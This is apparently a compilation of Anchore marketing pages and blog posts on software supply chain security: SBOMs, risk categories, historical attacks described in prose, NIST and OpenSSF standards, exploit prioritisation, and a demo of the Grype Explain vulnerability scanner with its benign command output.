The Complete Guide to Software Supply Chain Security

The mega-trends of the containerization of applications and the rise of open-source software components have sped up the velocity of software delivery. This evolution, while offering significant benefits, has also introduced complexity and challenges to traditional software supply chain security. 

Anchore was founded on the belief that the legacy security solutions of the monolith-era could be re-built to deliver on the promises of speed without sacrificing security. Anchore is trusted by Fortune 100 companies and the most exacting federal agencies across the globe because it has delivered on this promise.  

If you’d like to learn more about how the Anchore Enterprise platform is able to accomplish this, feel free to book a time to speak with one of our specialists.

If you’re looking to get a better understanding of how software supply chains operate, where the risks lie and best practices on how to manage the risks, then keep reading.

An Overview of Software Supply Chains 

Before you can understand how to secure the software supply chain, it’s important to understand what the software supply chain is in the first place. A software supply chain is all of the individual software components that make up a software application. 

Software supply chains are similar to physical supply chains. When you purchase an iPhone all you see is the finished product. Behind the final product is a complex web of component suppliers that are then assembled together to produce an iPhone. Displays and camera lenses from a Japanese company, CPUs from Arizona, modems from San Diego, lithium ion batteries from a Canadian mine; all of these pieces come together in a Shenzhen assembly plant to create a final product that is then shipped straight to your door. In the same way that an iPhone is made up of a screen, a camera, a CPU, a modem, and a battery, modern applications are composed of individual software components (i.e. dependencies) that are bundled together to create the finished product. 

With the rise of open source software, most of these components are open source frameworks, libraries and operating systems. Specifically, 70-90% of modern applications are built utilizing open source software components. Before the ascent of open source software, applications were typically developed with proprietary, in-house code without a large and diverse set of software “suppliers”. In this environment the entire “supply chain” were employees of the company which reduced the complex nature of managing all of these teams. The move to Cloud Native and DevSecOps design patterns dramatically sped up the delivery of software with the complication that the complexity of coordinating all of the open source software suppliers increased significantly.

This shift in the way that software is developed impacts essentially all modern software that is written. This means that all businesses and government agencies are waking up to the realization that they are building a software supply chain whether they want it or not.

One of the ways this new supply chain complexity is being tamed is with the software bill of materials (SBOM). A software bill of materials (SBOM) is a structured list of software components, modules, and libraries that are included in a given piece of software. Similar to the nutrition labels on the back of the foods that you buy, SBOMs are a list of ingredients that go into the software that your applications consume. We normally think of SBOMs as an artifact of the development process. As a developer is “manufacturing” their application using different dependencies they are also building a “recipe” based on the ingredients.

What is software supply chain security? 

Software supply chain security is the process of finding and preventing any vulnerabilities that exist from impacting the software applications that utilize the vulnerable components. Going back to the iPhone analogy from the previous section, in the same way that an attacker could target one of the iPhone suppliers to modify a component before the iPhone is assembled, a software supply chain threat actor could do the same but target an open source package that is then built into a commercial application. 

Given the size and prevalence of open source software components in modern applications, the supply chain is only as secure as its weakest link. The image below of the iceberg has become a somewhat overused meme of software supply chain security but it has become overused precisely because it explains the situation so well.

A different analogy would be to view the open source software components that your application is built using as a pyramid. Your application’s supply chain is all of the open source components that your proprietary business logic is built on top of. The rub is that each of these components that you utilize have their own pyramid of dependencies that they are built with. The foundation of your app might look solid but there is always the potential that if you follow the dependencies chain far enough down that you will find a vulnerability that could topple the entire structure.

This gives adversaries their opening. A single compromised package allows attackers to manipulate all of the packages “downstream” of their entrypoint.

This reality was viscerally felt by the software industry (and all industries that rely on the software industry, meaning all industries) during the Log4j incident. 

Common Software Supply Chain Risks

Software development is a multifaceted process, encompassing various components and stages. From the initial lines of code to the final deployment in a production environment, each step presents potential risks for vulnerabilities to creep in. As organizations increasingly integrate third-party components and open-source libraries into their applications, understanding the risks associated with the software supply chain becomes paramount. This section delves into the common risks that permeate the software supply chain, offering insights into their origins and implications.

Source Code

Supply chain risks start with the code itself. Below are the most common risks associated with a software supply chain when generating custom first-party code:

  1. Insecure first-party code

Custom code is the first place to be aware of risk in the supply chain. If the code written by your developers isn’t secure then your application will be vulnerable at its foundation. Insecure code is any application logic that can be manipulated to perform a function that wasn’t originally intended by the developer.

For example, if a developer writes a function that allows a user to login to their account by checking the user database that a username and password match the ones provided by the user but an attacker crafts a payload that instead causes the function to delete the entire user database this is insecure code.

  1. Source code management (SCM) compromise

Source code is typically stored in a centralized repository so that all of your developers can collaborate on the same codebase. An SCM is software that can potentially be vulnerable the same as your first-party code. If an adversary gains access to your SCM through a vulnerability in the software or through social engineering then they will be able to manipulate your source code at the foundation.

  1. Developer environments

Developer environments are powerful productivity tools for your engineers but they are another potential fount of risk for an organization. Most integrated developer environments come with a plug-in system so that developers can customize their workflows for maximum efficiency. These plug-in systems typically also have a marketplace associated with them. In the same way that a malicious Chrome browser plug-in and compromise a user’s laptop, a malicious developer plug-in can gain access to a “trusted” engineers development system and piggyback on this trusted access to manipulate the source code of an application.

3rd-Party Dependencies (Open source or otherwise)

Third-party software is really just first-party software written by someone else. The same way that the cloud is just servers run by someone else. Third-party software dependencies are potentially vulnerable to all of the same risks associated with your own first-party code in the above section. Since it isn’t your code you have to deal with the risks in a different way. Below we layout the two risks associated with this software supply chain risk:

  1. Known vulnerabilities (CVEs, etc)

Known vulnerabilities are insecure or malicious code that has been identified in a third-party dependency. Typically the maintainer of a third-party dependency will fix their insecure code when they are notified and publish an update. Sometimes if the vulnerability isn’t a priority they won’t address it for a long time (if ever). If your developers rely on this dependency for your application then you have to assume the risk.

  1. Unknown vulnerabilities (zero-days)

Unknown vulnerabilities are insecure or malicious code that hasn’t been discovered. These vulnerabilities can lay dormant in a codebase for months, years or even decades. When they are finally uncovered and announced there is typically a scramble across the world by any business that uses software (i.e. almost all businesses) to figure out whether they utilize this dependency and how to protect themselves from having it be exploited. Attackers are in a scramble themselves to determine who is using the vulnerable software and crafting exploits to take advantage of businesses that are slow to react.

Build Pipeline & Artifact Repository

  1. Build pipeline compromise

A software build pipeline is a software system that pulls the original source code from an SCM then pulls all of the third-party dependencies from their source repositories and goes through the process of creating and optimizing the code into a binary that can then be stored in an artifact repository. It is similar to an SCM in that it is software, it is composed of both first- and third-party code which means there will be all of the same associated risks to its source code and software dependencies.

Organizations deal with these risks differently than the developers of the build systems because they do not control this code. Instead the risks are around managing who has access to the build system and what they can do with their access. Risks range from modifying where the build system is pulling source code from to modifying the build instructions to inject malicious or vulnerable code into previously secure source.

  1. Artifact registry compromise

An artifact registry is a centralized repository of the fully built applications (typically in the format of a container or image) that a deployment orchestrator would use to pull the software from in order to run it in a production environment. It is also software similar to a build pipeline or SCM and has the same associated risks as mentioned before.

Typically, the risks of registries are managed through how trust is managed between the registry and the build system or any other system/person that has access to it. Risks range from an attacker poisoning the registry with an untrusted container or an attacker gaining privileged access to the repository and modifying a container in place.

Production

  1. Deployment orchestrator compromise

A deployment orchestrator is a system that pulls pre-built software binaries and runs the applications on servers. It is another type of software system similar to a build pipeline or SCM and has the same associated risks as mentioned before.

Typically, the risks of orchestrators are managed through trust relationships between the orchestrator and the artifact registry or any other system/person that has access to it. Risks range from an attacker manipulating the orchestrator into deploying an untrusted container or an attacker gaining privileged access to the orchestrator and modifying a running container or manifest.

  1. Production environment compromise

The production environment is the application running on a server that was deployed by an orchestrator. It is the software system built from the original source code that fulfills user’s requests. It is the final product that is created from the software supply chain. The risks associated with this system are different from most other systems because it typically serves users outside of the organization and has different risks associated with it because not as much is known about external users as internal users. 

Examples of software supply chain attacks

As reliance on third-party components and open-source libraries grows, so does the potential for vulnerabilities in the software supply chain. Several notable incidents have exposed these risks, emphasizing the need for proactive security and a deep understanding of software dependencies. In this section, we explore significant software supply chain attacks and the lessons they impart.

SolarWinds (2020)

In one of the most sophisticated supply chain attacks, malicious actors compromised the update mechanism of SolarWinds’ Orion software. This breach allowed the attackers to distribute malware to approximately 18,000 customers. The attack had far-reaching consequences, affecting numerous government agencies, private companies, and critical infrastructure.

Lessons Learned: The SolarWinds attack underscored the importance of securing software update mechanisms and highlighted the need for continuous monitoring and validation of software components.

Log4j (2021)

In late 2021, a critical vulnerability was discovered in the Log4j logging library, a widely used Java-based logging utility. Dubbed “Log4Shell,” this vulnerability allowed attackers to execute arbitrary code remotely, potentially gaining full control over vulnerable systems. Given the ubiquity of Log4j in various software applications, the potential impact was massive, prompting organizations worldwide to scramble for patches and mitigation strategies.

Lessons Learned: The Log4j incident underscored the risks associated with ubiquitous open-source components. It highlighted the importance of proactive vulnerability management, rapid response to emerging threats, and the need for organizations to maintain an updated inventory of third-party components in their software stack.

NotPetya (2017)

Originating from a compromised software update mechanism of an Ukrainian accounting software, NotPetya spread rapidly across the globe. Masquerading as ransomware, its primary intent was data destruction. Major corporations, including Maersk, FedEx, and Merck, faced disruptions, leading to financial losses amounting to billions.

Lessons Learned: NotPetya highlighted the dangers of nation-state cyber warfare and the need for robust cybersecurity measures, even in seemingly unrelated software components.

Node.js Packages coa and rc

In July 2021, two widely-used npm packages, coa and rc, were compromised. Malicious versions of these packages were published to the npm registry, attempting to run a script to access sensitive information from users’ .npmrc files. The compromised versions were downloaded thousands of times before being identified and removed.

Lessons Learned: This incident emphasized the vulnerabilities in open-source repositories and the importance of continuous monitoring of dependencies. It also highlighted the need for developers and organizations to verify the integrity of packages before installation and to be wary of unexpected package updates.

JuiceStealer Malware

JuiceStealer is a malware spread through a technique known as typosquatting on the PyPI (Python Package Index). Malicious packages were seeded on PyPI, intending to infect users with the JuiceStealer malware, designed to steal sensitive browser data. The attack involved a complex chain, including phishing emails to PyPI developers.

Lessons Learned: JuiceStealer showcased the risks of typosquatting in package repositories and the importance of verifying package names and sources. It also underscored the need for repository maintainers to have robust security measures in place to detect and remove malicious packages promptly.

Node.js Packages colors and faker

In January 2022, the developer behind popular npm libraries colors and faker intentionally sabotaged both packages in an act of “protestware.” This move affected thousands of applications, leading to broken builds and potential security risks. The compromised versions were swiftly removed from the npm registry.

Lessons Learned: This incident highlighted the potential risks associated with relying heavily on open-source libraries and the actions of individual developers. It underscored the importance of diversifying dependencies, having backup plans, and the need for the open-source community to address developer grievances constructively.

Standards and Best Practices for Preventing Attacks

There are a number of different initiatives to define best practices for software supply chain security. Organizations ranging from the National Institute of Standards and Technology (NIST) to the Cloud Native Computing Foundation (CNCF) to Open Source Security Foundation (OpenSSF) have created fantastically detailed documentation on their recommendations to achieve an optimally secure supply chain.

Choosing any of the standards defined is better than choosing none or even cherry-picking from each of the standards to create a program that is best tailored to the risk profile of your organization. If you’d prefer to stick to one for simplicity sake and need some help deciding, Anchore has detailed our thoughts on the pros and cons of each software supply chain standard here.

Below is a concise summary of each of the major standards to help get you started:

National Institute of Standards and Technology (NIST)

NIST has a few different standards that are worth noting. We’ve ordered them from the broadest to the most specific and, coincidently, chronically as well.

NIST SP 800-53, “Security and Privacy Controls for Information Systems and Organizations”

NIST 800-53, aka the Control Catalog, is the grandaddy of NIST security standards. It has had a long life and evolved alongside the security landscape. Typically paired with NIST 800-37, the Risk Management Framework or RMF, this pair of standards create a one-two punch that not only produce a highly secure environment for protecting classified and confidential information but set up organizations to more easily be compliant with federal compliance standards like FedRAMP.

Software supply chain security (SSCS) topics first began filtering into NIST 800-53 in 2013 but it wasn’t until 2020 that the Control Catalog was updated to break out SSCS into its own section. If your concern is to get up and running with SCSS as quickly as possible then this standard will be overkill. If your goal is to build toward FedRAMP and NIST 800-53 compliance as well as build a secure software development process then this standard is for you. If you’re looking for something more specific, one of the two next standards might be for you.

If you need a comprehensive guide to NIST 800-53 or its spiritual sibling, NIST 800-37, we have put together both. You can find a detailed but comprehensible guide to the Control Catalog here and the same plain english, deep-dive into NIST 800-37 here.

NIST SP 800-161, “Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations”

NIST 800-161 is an interesting application of both the RMF and the Control Catalog for supply chain security specifically. The controls in NIST 800-161 take the base controls from NIST 800-53 and provide guidance on how to achieve more specific outcomes for the controls. For the framework, NIST 800-161 takes the generic RMF and creates a version that is tailored to SSCS. 

NIST 800-161 is a comprehensive standard that will guide your organization to create a development process with its primary output being highly secure software and systems. 

NIST SP 800-218, “Secure Software Development Framework (SSDF)”

NIST 800-218, the SSDF, is an even more refined standard than NIST 800-161. The SSDF targets the software developer as the audience and gives even more tailored recommendations on how to create secure software systems.

If you’re a developer attempting to build secure software that complies with all of these standards, we have an ongoing blog series that breaks down the individual controls that are part of the SSDF.

NIST SP 800-204D, “Strategies for the Integration of Software Supply Chain Security in DevSecOps CI/CD Pipelines”

Focused specifically on Cloud-native architectures and Continuous Integration/Continuous Delivery (CI/CD) pipelines, NIST 800-204D is a significantly more specific standard than any of the previous standards. That being said, if the primary insertion point for software supply chain security in your organization is via the DevOps team then this standard will have the greatest impact on your overall software supply chain security.

Also, it is important to note that this standard is still a draft and will likely change as it is finalized.

Open Source Security Foundation (OpenSSF)

A project of the Linux Foundation, the Open Source Security Foundation is a cross-industry organization that focuses on the security of the open source ecosystem. Since most 3rd-party dependencies are open source they carry a lot of weight in the software supply chain security domain. 

Supply-chain Levels for Software Artifacts (SLSA)

If an SBOM is an ingredients label for a product then the SLSA (pronounced ‘salsa’) is the food safety handling guidelines of the factory where they are produced. It focuses primarily on updating traditional DevOps workflows with signed attestations around the quality of the software that is produced.

Google originally donated the framework and has been using an internal version of SLSA since 2013 which it requires for all of their production workloads. 

You can view the entire framework on its dedicated website here

Secure Supply Chain Consumption Framework (S2C2F) 

The S2C2F is similar to SLSA but much broader in its scope. It gives recommendations around the security of the entire software supply chain using both traditional security practices such as scanning for vulnerabilities. It touches on signed attestations but not at the same level of depth at the SLSA.

The S2C2F was built and donated by Microsoft, where it has been used and refined internally since 2019.

You can view the entire list of recommendations on its GitHub repository.

Cloud Native Computing Foundation (CNCF)

The CNCF is also a project of the Linux Foundation but is focused on the entire ecosystem of open-source, cloud-native software. The Security Technical Advisory Group at the CNCF has a vested interest in supply chain security because the majority of the software that is incubated and matured at the CNCF is part of the software development lifecycle.

Software Supply Chain Best Practices White Paper

The Security Technical Advisory Group at CNCF, created a best practices white paper that was heralded as a huge step forward for the security of software supply chains. The document creation was led by the CTO of Docker and the Chief Open Source Officer at Isovalent. It captures over 50 recommended practices to secure the software supply chain.

You can view the full document here.

Types of Supply Chain Compromise

This document isn’t a standard or best practices, instead it is support for the best practices white paper that defines a full list of supply chain compromises.

Catalog of Supply Chain Compromises

This isn’t a standard or best practices document, as well. It is instead a detailed history of the significant supply chain breaches that have occurred over the years. Helpful for understanding this history that informed the best practices detailed in the accompanying white paper.

How Anchore Can Help 

Anchore is a leading software supply chain security company that has built a modern, SBOM-powered software composition analysis (SCA) platform that helps organizations incorporate many of the software supply chain best practices that are defined in the above guides.

As we have learned working with Fortune 100 enterprises and federal agencies, including the Department of Defense, an organization’s supply chain security can only be as good as the depth of their data on their supply chain and the automation of processing the raw data into actionable insights. Anchore Enterprise provides an end-to-end software supply chain security system with total visibility, deep inspection, automated enforcement, expedited remediation and trusted reporting to deliver the actionable insights to make a supply chain as secure as possible.

If you’d like to learn more about the Anchore Enterprise platform or speak with a member of our team, feel free to book a time to speak with one of our specialists.

Detecting Exploits within your Software Supply Chain

SBOMs. What are they good for? At Anchore, we see SBOMs (software bills of material) as the foundation of an application’s supply chain hierarchy. Upon this foundation you can build a lot of powerful features, such as, the ability to detect vulnerabilities in your open source dependencies before they are pushed to production. An unintended side effect of giving users the power to easily see deeply into their application’s dependencies and detect the vulnerabilities in those dependencies is that there can sometimes be hundreds of vulnerabilities discovered in the process. 

We’ve seen customer applications that generate up to 400+ known vulnerabilities! This creates an information overload that typically ends in the application developer ignoring the results because it is too much effort to triage and remediate each one. Knowing that an application is riddled with vulnerabilities is better than not but excessive information does not lead to actionable insights. 

Anchore Enterprise solves this challenge by pairing vulnerability data (e.g. CVEs, etc) with exploit data (e.g. KEV, etc). By combining these two data sources we can create actionable insight by showing users both the vulnerabilities in their applications and which vulnerabilities are actually being exploited. Actively exploited vulnerabilities are significantly higher risk and can be prioritized for triage and remediation first. In this blog post, we’ll discuss how we do that and how it can save both your security team and application developers time.

How Does Anchore Enterprise Help You Find Exploits in Your Application Dependencies?

What is an Exploited Vulnerability?

“Exploited” is an important distinction because it means that not only does a vulnerability exist but a payload also exists that can reliably trigger the vulnerability and cause an application to execute unintended functionality (e.g. leaking all of the contents of a database or deleting all of the data in a database). For instance, almost all bank vaults in the world are vulnerable to an asteroid strike “deleting” all of the contents of the safe but no one has developed a system to reliably cause an asteroid to strike bank vaults. Maybe Elon Musk can make this happen in a few more years but today this vulnerability isn’t exploitable. It is important for organizations to prioritize exploited vulnerabilities because the potential for damage is significantly greater.

Source High-Quality Data on Exploits

In order to find vulnerabilities that are exploitable, you need high-quality data from security researchers that are either crafting exploits to known vulnerabilities or analyzing attack data for payloads that are triggering an exploit in a live application. Thankfully, there are two exceedingly high-quality databases that publish this information publicly and regularly; the Known Exploited Vulnerability (KEV) Catalog and the Exploit Database (Exploit-DB).

The KEV Catalog is a database of known exploited vulnerabilities that is published and maintained by the US government through the Cybersecurity and Infrastructure Security Agency, CISA. It is updated regularly; they typically add 1-5 new KEVs every week. 

While not an exploit database itself, the National Vulnerability Database (NVD) is an important source of exploit data because it checks all of the vulnerabilities that it publishes and maintains against the Exploit-DB and embeds the relevant identifiers when a match is found.

Anchore Enterprise ingests both of these data feeds and stores the data in a centralized repository. Once this data is structured and available to your organization it can then be used to determine which applications and their associated dependencies are exploitable.

Map Data on Exploits to Your Application Dependencies

Now that you have a quality source of data on known exploited vulnerabilities, you need to determine if any of these exploits exist in your applications and/or the dependencies that they are built with. The industry-standard method for storing information on applications and their dependency supply chain is via a software bill of materials (SBOM)

After you have an SBOM for your application you can then cross-reference the dependencies against both a list of known vulnerabilities and a list of known exploited vulnerabilities. The output of this is a list of all of the applications in your organization that are vulnerable to exploits.

If done manually, via something like a spreadsheet this can quickly become a tedious process. Anchore Enterprise automates this process by generating SBOMs for all of your applications and running scans of the SBOMs against vulnerability and exploit databases. 

How Does Anchore Enterprise Help You Prioritize Remediation of Exploits in Your Application Dependencies?

Once we’ve used Anchore Enterprise to detect CVEs in our containers that are also exploitable through the KEV or ExploitDB lists, then we can take the severity score back into account with more contextual evidence. We need to know two things for each finding: what is the severity of the finding and can I accept the risk associated with leaving that vulnerable code in my application or container. 

If we look back to the Log4J event in December of 2021, that particular vulnerability scored a 10 on the CVSS. That score alone provides us little detail on how dangerous that vulnerability is. If a CVE is discovered against any given piece of software and the NVD researchers cannot reach the authors of the code, then it’s assigned a score of 10 and the worst case is assumed. 

However, if we have applied our KEV and ExploitDB bundles and determined that we do indeed have a critical vulnerability that has active known exploits and evidence that it is being exploited in the wild AND the severity exceeds our personal or organizational risk thresholds then we know that we need to take action immediately. 

Everyone has questioned the utility of the SBOM but Anchore Enterprise is making this an afterthought. Moving past the basics of just generating an SBOM and detecting CVE’s, Anchore Enterprise is automatically mapping exploit data to specific packages in your software supply chain allowing you to generate reports and notifications for your teams. By analyzing this higher quality information, you can determine  which vulnerabilities actually pose a threat to your and in turn make more intelligent decisions about which to fix and which to accept, saving your organization time and money.

Wrap Up

Returning to our original question, “what are SBOMs good for”? It turns out the answer is scaling the process of finding and prioritizing vulnerabilities in your organization’s software supply chain.

In today’s increasingly complex software landscape, the importance of securing your application’s supply chain cannot be overstated. Traditional SBOMs have empowered organizations to identify vulnerabilities but often left them inundated with too much information, rendering the data less actionable. Anchore Enterprise revolutionizes this process by not only automating the generation of SBOMs but also cross-referencing them against reputable databases like KEV Catalog and Exploit-DB to isolate actively exploited vulnerabilities. By focusing on the vulnerabilities that are actually being exploited in the wild, your security team can prioritize remediation efforts more effectively, saving both time and resources. 

Anchore Enterprise moves beyond merely detecting vulnerabilities to providing actionable insights, enabling organizations to make intelligent decisions on which risks to address immediately and which to monitor. Don’t get lost in the sea of vulnerabilities; let Anchore Enterprise be your compass in navigating the choppy waters of software security.

If you’d like to learn more about the Anchore Enterprise platform or speak with a member of our team, feel free to book a time to speak with one of our specialists

Introducing Grype Explain

Since releasing Grype 3 years ago (in September 2020), one of the most frequent questions we’ve gotten is, “why is image X vulnerable to vulnerability Y?” Today, we’re introducing a new sub-command to help users answer this question: Grype Explain.

Now, when users are surprised to see some CVE they’ve never heard of in their Grype output, they can ask Grype to explain itself: grype -o json alpine:3.7 | grype explain --id CVE-2021-42374. We’re asking the community to please give it a try, and if you have feedback or questions, let us know.

The goal of Grype Explain is to help operators evaluate a reported vulnerability so that they can decide what, if any, action to take. To demonstrate, let’s look at a simple scenario.

First, an operator who deploys a file called fireline.hpi into production sees some vulnerabilities:

❯ grype fireline.hpi| grep Critical

✔ Vulnerability DB                [no update available]
✔ Indexed file system
✔ Cataloged packages              [35 packages]
✔ Scanned for vulnerabilities     [36 vulnerabilities]
├── 10 critical, 14 high, 9 medium, 3 low, 0 negligible
└── 14 fixed

bcel                 6.0-SNAPSHOT  6.6.0     java-archive    GHSA-97xg-phpr-rg8q  Critical
commons-collections  3.1           3.2.2     java-archive    GHSA-fjq5-5j5f-mvxh  Critical
dom4j                1.6.1         2.0.3     java-archive    GHSA-hwj3-m3p6-hj38  Critical
fastjson             1.2.9         1.2.31    java-archive    GHSA-xjrr-xv9m-4pw5  Critical
fastjson             1.2.9                   java-archive    CVE-2022-25845       Critical
fastjson             1.2.9                   java-archive    CVE-2017-18349       Critical
log4j-core           2.11.1        2.12.2    java-archive    GHSA-jfh8-c2jp-5v3q  Critical
log4j-core           2.11.1        2.12.2    java-archive    GHSA-7rjr-3q55-vv33  Critical
log4j-core           2.11.1                  java-archive    CVE-2021-45046       Critical
log4j-core           2.11.1                  java-archive    CVE-2021-44228       Critical

Wait, isn’t CVE-2021-44228 log4shell? I thought we patched that! The operator asks for an explanation of the vulnerability:

❯ grype -q -o json fireline.hpi| grype explain --id CVE-2021-44228

[0000]  WARN grype explain is a prototype feature and is subject to change

CVE-2021-44228 from nvd:cpe (Critical)

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1)
JNDI features used in configuration, log messages, and parameters do not protect against attacker
controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log
message parameters can execute arbitrary code loaded from LDAP servers when message lookup
substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From
version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely
removed. Note that this vulnerability is specific to log4j-core and does not affect log4net,
log4cxx, or other Apache Logging Services projects.

Related vulnerabilities:
    - github:language:java GHSA-jfh8-c2jp-5v3q (Critical)
Matched packages:
    - Package: log4j-core, version: 2.11.1
      PURL: pkg:maven/org.apache.logging.log4j/[email protected]
      Match explanation(s):
          - github:language:java:GHSA-jfh8-c2jp-5v3q Direct match (package name, version, and
            ecosystem) against log4j-core (version 2.11.1).
          - nvd:cpe:CVE-2021-44228 CPE match on `cpe:2.3:a:apache:log4j:2.11.1:*:*:*:*:*:*:*`.
      Locations:
          - /fireline.hpi:WEB-INF/lib/fireline.jar:lib/firelineJar.jar:log4j-core-2.11.1.jar
URLs:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

Right away this gives us some information an operator might need:

  • Where’s the vulnerable file?
    • /fireline.hpi:WEB-INF/lib/fireline.jar:lib/firelineJar.jar:log4j-core-2.11.1.jar
    • Seeing the location inside a jar inside the .hpi file tells the operator that a jar inside a jar inside the .hpi file is responsible for the vulnerability.
  • How was it matched?
    • Seeing both a CPE match on cpe:2.3:a:apache:log4j:2.11.1:*:*:*:*:*:*:* and a GHSA match on pkg:maven/org.apache.logging.log4j/[email protected] gives the operator confidence that this is a real match. 
  • What’s the URL where I can read more about it?
    • Links to the NVD and GHSA sites for the vulnerability are printed out so the operator can easily learn more.

Based on this information, the operator can assess the severity of the issue, and know what to patch.

We hope that Grype Explain will help users better understand and respond faster to vulnerabilities in their applications. Do you have feedback on how Grype Explain could be improved? Please let us know!

How to Scan Your Containers for Vulnerabilities with Free Open Source Tools

This blog post has been archived and replaced by the supporting pillar page that can be found here:

https://anchore.com/wp-admin/post.php?post=987473420&action=edit

The blog post is meant to remain “public” so that it will continue to show on the /blog feed. This will help discoverability for people browsing the blog and potentially help SEO. If it is clicked on it will automatically redirect to the pillar page.

NIST’s Comprehensive Approach to Software Supply Chain Security

The National Institute of Standards and Technology (NIST) has always been at the forefront of setting benchmarks and standards for industry. They recently released a draft publication, 800-240D, titled “Strategies for the Integration of Software Supply Chain Security in DevSecOps CI/CD pipelines.” This document is exciting as it’s a testament to their commitment to evolving with the times and addressing challenges with supply chain security.

It should be noted that this current document is a draft. NIST is seeking guidance from stakeholders in order to write the final draft. Anyone who has input on this topic can and should contribute suggestions. NIST guidance is not produced in a bubble, it’s important we all help collaborate on these documents.

Understanding the Significance of the Supply Chain

Before we explain the purpose of the document, it’s important to understand the software supply chain’s complexity. When we think of “supply chain” we have historically imagined lines of code, software packages, and developer tools. However, it’s a complex system that spans the foundational hardware, operating systems that run on them, developer workstations where software is crafted, and even the systems that distribute our software to users worldwide. Each node in this chain presents unique challenges with the idea of security.

A great deal of previous guidance has been heavily focused on the development and procurement of software that goes into products. NIST 800-240D is a document that focuses on continuous integration and continuous delivery (CI/CD) systems. The security of a CI/CD system is no less important than the security of the packages that go into your software.

NIST’s Holistic Approach

With 800-240D, NIST isn’t merely adding another document to the pile. NIST recently released 800-218 or the Security Software Development Framework; they maintain 800-53, the granddaddy of most other cybersecurity compliance frameworks. NIST is signaling they want to help move the goal in how the industry should approach software supply chain security. In this instance by emphasizing CI/CD pipelines, NIST is highlighting the importance of the processes that drive software development and deployment, rather than just the end product.

While there’s no shortage of guidance on CI/CD pipelines, much of the existing literature is either outdated or too narrow in scope. This is where NIST’s intervention should make us pay attention. Their comprehensive approach ensures that every aspect of the software supply chain, from code creation to deployment, is under scrutiny.

Comparing with Existing Content

The CNCF supply chain security white paper serves as an example. A few years ago, this document was hailed as a significant step forward. It provided a detailed overview of supply chain concerns and offered solutions to secure them. However, the document hasn’t seen an update in over two years. The tech landscape is ever-evolving. What was relevant two years ago might not hold today. This rapid evolution underscores the need for regularly updated guidance.

Maintaining and updating such comprehensive documents is no small feat. It requires expertise, resources, and a commitment to staying on top of industry developments. NIST, who has been providing guidance like this for decades, is uniquely positioned to take on this challenge. Their track record of maintaining and updating documents over extended periods is unparalleled.

The Promise of Modern Initiatives

Modern projects like SLSA and S2C2F have shown promise. They represent the industry’s proactive approach to addressing supply chain security challenges. However, they face inherent challenges that NIST does not. The lack of consistent funding and a clear mandate means that their future is less certain than a NIST document. Key personnel changes, shifts in organizational priorities, or a myriad of other factors could unexpectedly derail their progress.

NIST, with its government backing, doesn’t face these challenges. NIST guidance is not only assured of longevity but also of regular updates to stay relevant. This longevity ensures that even as projects like SLSA or S2C2F evolve or new initiatives emerge, there’s a stable reference point that the industry can rely on. Of course, something becoming a NIST standard doesn’t solve all problems, sometimes NIST guidance can become outdated and isn’t updated as often as it should be. Given the rash of government mandates around security lately, this is not expected to happen for supply chain related guidance.

The NIST Advantage

NIST’s involvement goes beyond just providing guidance. Their reputation and credibility mean that their publications carry significant weight. Organizations, both public and private, pay attention when NIST speaks. The guidance NIST has been providing to the United States since its inception has helped the industry in countless ways. Everything from safety, to measurements, even keeping our clocks running! This influence ensures that best practices and recommendations are more likely to be adopted, leading to a more secure and robust software supply chain.

However, it’s essential to temper expectations. While NIST’s guidance is invaluable, it’s not magic. Some NIST standards become outdated, some are difficult for small businesses or individuals to follow. Not all recommendations can be universally applicable. However given the current global focus on supply chain security, we can expect NIST to be proactive in updating their guidance.

It should also be noted that NIST guidance has a feedback mechanism. In the case of 800-240D, the document is a draft. NIST wants feedback. The current document will change between the current draft and the final version. Good feedback is a way we can all ensure the guidance is high quality.

Looking Ahead

The broader message from NIST’s involvement is clear: broad supply chain security is important. It’s not about isolated solutions or patchwork fixes. The industry needs a comprehensive approach that addresses risk at every stage of the software supply chain.

In NIST’s proactive approach, there is hope. Their commitment to providing long-lasting, influential guidance, combined with their holistic view of the supply chain, promises a future where supply chain security is not just an afterthought but an integral part of software development and deployment.

NIST’s 800-240D is more than just a publication. It’s a call for the industry to come together, adopt best practices, and work towards a future where software supply chain security is robust, reliable, and resilient.

If you’d like to learn more about how Anchore can help with NIST compliance, feel free to book a time to speak with one of our specialists.

Josh Bressers

Josh Bressers is vice president of security at Anchore where he guides security feature development for the company’s commercial and open source solutions. He serves on the Open Source Security Foundation technical advisory council and is a co-founder of the Global Security Database project, which is a Cloud Security Alliance working group that is defining the future of security vulnerability identifiers.

Scaling Software Security with NVIDIA

Personal computing and Apple in the 80s. The modern internet and Netscape in the 90s. Open source and Red Hat in the 2000s. Cloud and Amazon Web Services in the 2010s. Certain companies tend to define the computing paradigm of a decade. And so it is with AI and Nvidia in the 2020s. With its advanced GPU hardware, NVIDIA has enabled stunning advances in machine learning and AI models. That, in turn, has enabled services such as GitHub CoPilot and ChatGPT. 

However, AI/ML is not just a hardware and data story. Software continues to be the glue that enables the use of large data sets with high-performance hardware. Like Intel before them, NVIDIA is as much a software solution vendor as a hardware company, with applications like CUDA and others being how developers interact with NVIDIA’s GPUs. Building on the trends of previous decades, much of this software is built from open source and designed to run on the cloud. 

Unfortunately, the less welcome trend over the past decade has been increased software insecurity and novel attack vectors targeted at open source and the supply chain in general. For the past few years, we’ve been proud to partner with NVIDIA to ensure that the software they produce is secure and also secure for end users to run on their NVIDIA GPU Cloud (NGC). This has not only been a question of high-quality security scanning but ensuring that scanning can happen at scale and in a cost-effective manner. 

We’re inviting the Anchore community to join us for a webinar with NVIDIA where we cover the use-case, architecture, and policies used by one of the most cutting-edge companies in technology. Those interested can learn more and save your seat here

Automated Policy Enforcement for CMMC with Anchore Enterprise

The Cyber Maturity Model Certification (CMMC) is an important program to harden the cybersecurity posture of the defense industrial base. Its purpose is to validate that appropriate safeguards are in place to protect controlled unclassified information (CUI). Many of the organizations that are required to comply with CMMC are Anchore customers. They have the responsibility to protect the sensitive, but not classified data, of US military and government agencies as they support the various missions of the United States. 

CMMC 2.0 Levels

  • Level 1 Foundation: Safeguard federal contract information (FCI); not critical to national security.
